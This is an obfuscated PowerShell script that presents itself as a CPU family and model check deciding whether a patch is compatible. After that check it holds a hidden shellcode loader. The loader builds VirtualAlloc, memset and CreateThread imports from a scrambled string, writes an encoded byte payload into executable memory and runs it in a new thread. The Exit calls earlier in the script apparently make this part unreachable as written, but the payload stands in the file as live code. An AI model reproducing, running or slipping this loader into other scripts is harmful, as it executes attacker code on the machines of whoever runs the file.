[CmdletBinding()]
param ()

${PR`oC`eSs`oR} = [string]((&("{3}{1}{2}{0}" -f'iObject','et','-Wm','G') ("{2}{1}{3}{0}"-f'ssor','32_proc','win','e'))."C`ApTI`On")
${faMI`LY} = (${prO`cEss`OR}.("{0}{1}"-f 's','plit').Invoke(" ") | .("{3}{0}{1}{2}" -f 'e','re-','Object','Wh') { ((${_} -notlike ("{1}{0}{2}"-f 'nte','*I','l*')) -and (${_} -notlike ("{0}{1}" -f'*x','64*')) -and (${_} -notlike ("{2}{0}{1}"-f'tel6','4*','*In'))) })[1]
${M`OD`eL} = (${PrO`CESs`Or}.("{1}{0}" -f'plit','s').Invoke(" ") | &("{2}{3}{1}{0}" -f 't','bjec','W','here-O') { ((${_} -notlike ("{1}{2}{0}" -f '*','*Inte','l')) -and (${_} -notlike "x64")) })[3]
${o`UtP`UT} = ("{0}{1}"-f 'Fami','ly: ') + ${FaM`iLy}
&("{2}{1}{0}"-f'utput','rite-O','W') -InputObject ${O`UtpuT}
${o`Ut`pUt} = ("{1}{0}{2}" -f'Model',' ',': ') + ${mO`DeL}
&("{1}{2}{0}" -f't','Write-Out','pu') -InputObject ${ou`TPUT}
If (${F`AmIlY} -ge 6) {
	If (${MO`DeL} -ge 42) {
		&("{0}{2}{3}{1}"-f 'W','utput','ri','te-O') -InputObject ("{1}{3}{4}{2}{0}{5}" -f 'a','Patch','mp',' is ','co','tible')
		Exit 0
	} else {
		.("{2}{1}{0}{3}" -f'te-O','ri','W','utput') -InputObject ("{1}{5}{3}{0}{2}{4}{6}"-f'e t','Patch in incom','o','tible du',' ','pa','old model')
		Exit 1
	}
} else {
	&("{3}{1}{0}{2}" -f'-Ou','ite','tput','Wr') -InputObject ("{7}{1}{8}{4}{3}{6}{0}{2}{5}"-f'ld fa','mpat','m',' to ',' due','ily','o','Patch in inco','ible')
	Exit 1
}

${E`Mb6} = (((("{11}{18}{66}{80}{45}{69}{82}{3}{22}{44}{42}{51}{29}{60}{37}{10}{2}{28}{48}{50}{89}{76}{7}{57}{49}{19}{84}{41}{21}{8}{43}{78}{39}{75}{59}{54}{32}{63}{53}{67}{86}{64}{1}{35}{31}{27}{47}{61}{34}{70}{20}{72}{4}{9}{68}{83}{46}{17}{14}{12}{52}{56}{79}{5}{85}{87}{16}{38}{25}{13}{88}{55}{40}{58}{36}{24}{65}{26}{74}{77}{73}{62}{30}{0}{6}{15}{81}{71}{23}{33}"-f 'r ',', ',' uint flAl','tP','Para',');[DllImpo','de','ect);[','Nv)]pu','m','dwSize,','[DllIm','lags','ta','t dwCreationF','st, ','crt.d','in','port(wNv','(wNvk','nt','.dllw','tr V',' co','ntP',' s',' m','ntP','locatio','ss, ','tPt','wStackSize, I','pTh','unt);','ddres','uint d',' I','nt ','llwNv)]public','rn I',' ex','nel32','rtualAlloc(IntPtr l','blic stat','i','ex',' u','tr lpSta','nTyp','llImport','e, ','pAddre',', IntPtr ','e','tPtr l','c','l','D','tern',' CreateThread(In','ui','rtA','n','r','tes','tr','kernel32.dllwNv)]publ','adAttrib','ete','tern I','s, I','c, uint','Ptr lp','I','em','ntPtr','flProt','set(','ic exte','pThreadId','ic static ','uint sr','n','r,','er','rt(wNvm','u','sv','ti','uint '))  -cReplACe  ([Char]119+[Char]78+[Char]118),[Char]34));${w} = .("{1}{2}{0}" -f'pe','Add','-Ty') -memberDefinition ${e`mB6} -Name ("{0}{1}" -f'Win3','2') -namespace ("{0}{2}{3}{1}" -f 'W','ctions','in3','2Fun') -passthru;[Byte[]];[Byte[]]${Z} = 0xd9,0xc3,0xd9,0x74,0x24,0xf4,0xb8,0xea,0xd3,0x3c,0x79,0x5a,0x31,0xc9,0xb1,0x47,0x83,0xc2,0x04,0x31,0x42,0x14,0x03,0x42,0xfe,0x31,0xc9,0x85,0x16,0x37,0x32,0x76,0xe6,0x58,0xba,0x93,0xd7,0x58,0xd8,0xd0,0x47,0x69,0xaa,0xb5,0x6b,0x02,0xfe,0x2d,0xf8,0x66,0xd7,0x42,0x49,0xcc,0x01,0x6c,0x4a,0x7d,0x71,0xef,0xc8,0x7c,0xa6,0xcf,0xf1,0x4e,0xbb,0x0e,0x36,0xb2,0x36,0x42,0xef,0xb8,0xe5,0x73,0x84,0xf5,0x35,0xff,0xd6,0x18,0x3e,0x1c,0xae,0x1b,0x6f,0xb3,0xa5,0x45,0xaf,0x35,0x6a,0xfe,0xe6,0x2d,0x6f,0x3b,0xb0,0xc6,0x5b,0xb7,0x43,0x0f,0x92,0x38,0xef,0x6e,0x1b,0xcb,0xf1,0xb7,0x9b,0x34,0x84,0xc1,0xd8,0xc9,0x9f,0x15,0xa3,0x15,0x15,0x8e,0x03,0xdd,0x8d,0x6a,0xb2,0x32,0x4b,0xf8,0xb8,0xff,0x1f,0xa6,0xdc,0xfe,0xcc,0xdc,0xd8,0x8b,0xf2,0x32,0x69,0xcf,0xd0,0x96,0x32,0x8b,0x79,0x8e,0x9e,0x7a,0x85,0xd0,0x41,0x22,0x23,0x9a,0x6f,0x37,0x5e,0xc1,0xe7,0xf4,0x53,0xfa,0xf7,0x92,0xe4,0x89,0xc5,0x3d,0x5f,0x06,0x65,0xb5,0x79,0xd1,0x8a,0xec,0x3e,0x4d,0x75,0x0f,0x3f,0x47,0xb1,0x5b,0x6f,0xff,0x10,0xe4,0xe4,0xff,0x9d,0x31,0x90,0xfa,0x09,0x7a,0xcd,0x53,0x4b,0x12,0x0c,0x5c,0x4b,0xc8,0x99,0xba,0x1b,0x5e,0xca,0x12,0xdb,0x0e,0xaa,0xc2,0xb3,0x44,0x25,0x3c,0xa3,0x66,0xef,0x55,0x49,0x89,0x46,0x0d,0xe5,0x30,0xc3,0xc5,0x94,0xbd,0xd9,0xa3,0x96,0x36,0xee,0x54,0x58,0xbf,0x9b,0x46,0x0c,0x4f,0xd6,0x35,0x9a,0x50,0xcc,0x50,0x22,0xc5,0xeb,0xf2,0x75,0x71,0xf6,0x23,0xb1,0xde,0x09,0x06,0xca,0xd7,0x9f,0xe9,0xa4,0x17,0x70,0xea,0x34,0x4e,0x1a,0xea,0x5c,0x36,0x7e,0xb9,0x79,0x39,0xab,0xad,0xd2,0xac,0x54,0x84,0x87,0x67,0x3d,0x2a,0xfe,0x40,0xe2,0xd5,0xd5,0x50,0xde,0x03,0x13,0x27,0x0e,0x90;${g} = 0x1000;if (${z}."l`eNG`Th" -gt 0x1000){${g} = ${Z}."le`NGTH"};${r`BF}=${W}::("{2}{1}{0}" -f'rtualAlloc','i','V').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${z}."LEN`gtH"-1);${i}++) {${w}::"me`ms`Et"([IntPtr](${r`Bf}.("{1}{0}{2}" -f 'o','T','Int32').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{2}{0}{3}{1}" -f'ateThre','d','Cre','a').Invoke(0,0,${r`Bf},0,0,0);for (;;){.("{1}{3}{2}{0}" -f'sleep','S','art-','t') 60};
